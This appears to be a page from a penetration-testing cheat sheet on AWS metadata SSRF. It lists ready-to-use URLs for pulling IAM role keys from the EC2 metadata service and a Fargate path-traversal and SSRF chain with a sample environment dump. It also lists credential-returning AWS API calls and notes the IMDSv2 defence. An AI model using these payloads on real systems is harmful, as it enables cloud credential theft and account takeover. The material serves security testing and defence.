AWS - Metadata SSRF
AWS released additional security defences against the attack.
Only working with IMDSv1.
Enabling IMDSv2 : aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-token required.
In order to use IMDSv2 you must provide a token.
export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"`
curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data"
Method for Elastic Cloud Compute (EC2)
Amazon provides an internal service that allows every EC2 instance to query and retrieve metadata about the host. If you discover an SSRF vulnerability running on an EC2 instance, try to fetch the content from 169.254.169.254.
- Access the IAM : http://169.254.169.254/latest/meta-data/
- Find the name of the role assigned to the instance : http://169.254.169.254/latest/meta-data/iam/security-credentials/
- Extract the role's temporary keys : http://169.254.169.254/latest/meta-data/iam/security-credentials/
/
Method for Container Service (Fargate)
- Fetch the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable from https://awesomeapp.com/download?file=/proc/self/environ
JAVA_ALPINE_VERSION=8.212.04-r0 HOSTNAME=bbb3c57a0ed3SHLVL=1PORT=8443HOME=/root AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447 AWS_EXECUTION_ENV=AWS_ECS_FARGATEMVN_VER=3.3.9JAVA_VERSION=8u212AWS_DEFAULT_REGION=us-west-2 ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/cb4f6285-48f2-4a51-a787-67dbe61c13ffPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin:/usr/lib/mvn:/usr/lib/mvn/binLANG=C.UTF-8AWS_REGION=us-west-2Tag=48111bbJAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jreM2=/usr/lib/mvn/binPWD=/appM2_HOME=/usr/lib/mvnLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjd - Use the credential URL to dump the AccessKey and SecretKey : https://awesomeapp.com/forward?target=http://169.254.170.2/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447
AWS API calls that return credentials
- chime:createapikey
- codepipeline:pollforjobs
- cognito-identity:getopenidtoken
- cognito-identity:getopenidtokenfordeveloperidentity
- cognito-identity:getcredentialsforidentity
- connect:getfederationtoken
- connect:getfederationtokens
- ecr:getauthorizationtoken
- gamelift:requestuploadcredentials
- iam:createaccesskey
- iam:createloginprofile
- iam:createservicespecificcredential
- iam:resetservicespecificcredential
- iam:updateaccesskey
- lightsail:getinstanceaccessdetails
- lightsail:getrelationaldatabasemasteruserpassword
- rds-db:connect
- redshift:getclustercredentials
- sso:getrolecredentials
- mediapackage:rotatechannelcredentials
- mediapackage:rotateingestendpointcredentials
- sts:assumerole
- sts:assumerolewithsaml
- sts:assumerolewithwebidentity
- sts:getfederationtoken
- sts:getsessiontoken
References
- AWS API calls that return credentials - kmcquade
- Cloud security instance metadata - PumaScan - Eric Johnson - 09 Oct 2019
- Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019
- Privilege escalation in the Cloud: From SSRF to Global Account Administrator - Maxime Leblanc - Sep 1, 2018
- Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019